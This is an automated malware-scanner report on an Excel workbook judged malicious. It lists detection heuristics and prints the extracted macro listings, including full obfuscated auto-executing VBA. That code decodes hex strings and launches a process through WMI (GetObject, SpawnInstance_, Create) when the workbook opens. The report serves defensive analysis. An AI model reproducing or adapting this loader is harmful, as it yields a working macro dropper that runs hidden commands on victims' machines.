Verdict: MALICIOUS
Risk score: 350
Heuristics: 10
Office EPRINT stream contains EMF object (severity: high, rule: OLE_EPRINT_EMF_OBJECT)
OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is supporting evidence of Office object delivery when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.

ClamAV: Xls.Malware.Valyria-9756472-0 (severity: critical, rule: CLAMAV_DETECTION)
ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0

URL reconstructed from XLM cell array (3 URLs) (severity: critical, rule: OLE_XLM_CELL_ARRAY_URL)
Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.

VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 4 related findings)
Document contains VBA macro code.

Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script: `Set ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ = GetObject(×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû²)`

GetObject call (severity: high, rule: OLE_VBA_GETOBJ)
GetObject call.
Matched line in script: `Set ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ = GetObject(×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû²)`

VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.

Workbook_Open macro (severity: low, rule: OLE_VBA_WBOPEN)
Workbook_Open macro.
Matched line in script: `Sub Workbook_Open()`

Excel 4.0 (XLM) macro sheet present (severity: medium, rule: OLE_XLM_AUTOOPEN)
Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Embedded URL (severity: info, rule: EMBEDDED_URL)
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- http://www.cmu.edu/blackboard (referenced by macro)
- http://www.cmu.edu/blackboard/files/evaluate/tests-example.xls (referenced by macro)
- http://www.cmu.edu/blackboard/evaluate#manage_tests/import_questions (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 2959 bytes |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6415 bytes |

xlm_macros.txt (xlm-macro, 2959 bytes, SHA-256: 94bdf34eb53bc8fa1f8786d17c0534cb5f72d1d233dcd2f187e136b4ee8ac6d8)
Preview (first 1,000 lines of the extracted script):

```
' 0085 20 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Format Abbr
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Readm
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - AYIU
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
```

macros.bas (vba-macro, 6415 bytes, SHA-256: bffb140cc08f871ae91d33c766becfd8dd8c3c556da38dabd03a0d65587e4844)
Preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ As String
Private ×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû² As String
Private 寲Ÿ¬ÖѾ¬ÙèÑô¿ÖúåÂöÀãè»ñµ¿Ÿº¼ÛSªü忊÷ßÖ As String
Private å¼Ò÷ɇ¾ÖÉÉìÀ¤áïÊê»Ä⾵Σõ¯ß¯¤Òs As String
Private ó綠àÔ¼Äâ¤çܸÁ¯Ôëµ§¨÷ﯬÙÅ䳌¹î¢½´ÉÇ»¼ As String
Private ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ As Object
Private ÍóË»»î´å²ºûµ¿×Ò¯Ñ×놩ƿ¼ß»Ü¸½°¾½èƒ«½ As Object
Private Const ò¸µú½¾®÷±ÉœêsßÕÛ´¾Œ·Y辊öµ»ê¢Ä¬âÖ = Null
Sub Workbook_Open()
Áê¾ó°á¤ÄÌæ¦¾£åéÒ×±×µÓŸË£â±ÌÕߨ좚¼÷
ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢.Create å¼Ò÷ɇ¾ÖÉÉìÀ¤áïÊê»Ä⾵Σõ¯ß¯¤Òs, ò¸µú½¾®÷±ÉœêsßÕÛ´¾Œ·Y辊öµ»ê¢Ä¬âÖ, ÍóË»»î´å²ºûµ¿×Ò¯Ñ×놩ƿ¼ß»Ü¸½°¾½èƒ«½, Null
End Sub
Private Sub Áê¾ó°á¤ÄÌæ¦¾£åéÒ×±×µÓŸË£â±ÌÕߨ좚¼÷()
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
Dim ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã As Long
Dim ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 As String: ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 = Chr(Int(0 + Int(13 / 2) + Int(11 / 4) + 7 + 3 + 3 + 5 + 4 + 8)) & Chr(Int(0 + Int(12 / 1) + Int(14 / 1) - 14 - 6 + 9 + 8 + 3 + 46))
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C9858DAABCC18685B2A3C5C2B6B8C6C6") Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C9858DAABCC18685B2A3C5C2B6B8C6C6", ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû² = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
Set ÍèñóÅãØ½¸¼É³Õ¾Ùµ®áÍÆÂ´£õÒȨ́×Ùĺó²ŠìíÍë¢ = GetObject(×ÛÃê½µ¹û«Ø¿îÊØßå´¾Û«ö®çòåᣬªä̦£ÅÔsû²)
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C985") Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid("CABCC1C0BAC0C7C68DAFAF81AFC5C2C2C7AFB6BCC0C985", ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
寲Ÿ¬ÖѾ¬ÙèÑô¿ÖúåÂöÀãè»ñµ¿Ÿº¼ÛSªü忊÷ßÖ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len(Sheets("AYIUJ").Cells(134, 8).Value) Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid(Sheets("AYIUJ").Cells(134, 8).Value, ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
å¼Ò÷ɇ¾ÖÉÉìÀ¤áïÊê»Ä⾵Σõ¯ß¯¤Òs = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
For ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã = 1 To Len("AABCC18685B2A3C5C2B6B8C6C6A6C7B4C5C7C8C3") Step 2
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ & Chr(CLng(±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã2 & Mid("AABCC18685B2A3C5C2B6B8C6C6A6C7B4C5C7C8C3", ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã, 2)) - 83)
Next ±±¢¿Í‡ÉÓº»áåö»ô£û±°º¿ã¾¯Èä½ÍªàÏã
ó綠àÔ¼Äâ¤çܸÁ¯Ôëµ§¨÷ﯬÙÅ䳌¹î¢½´ÉÇ»¼ = ©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
Set ÍóË»»î´å²ºûµ¿×Ò¯Ñ×놩ƿ¼ß»Ü¸½°¾½èƒ«½ = GetObject(寲Ÿ¬ÖѾ¬ÙèÑô¿ÖúåÂöÀãè»ñµ¿Ÿº¼ÛSªü忊÷ßÖ).Get(ó綠àÔ¼Äâ¤çܸÁ¯Ôëµ§¨÷ﯬÙÅ䳌¹î¢½´ÉÇ»¼).SpawnInstance_
©¿¯·©Œ´‡öĬíï¾ÀºS¿íŒ¤÷ÂÚô±ÌÏÀϱÁ‡µÍ¾ = ""
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```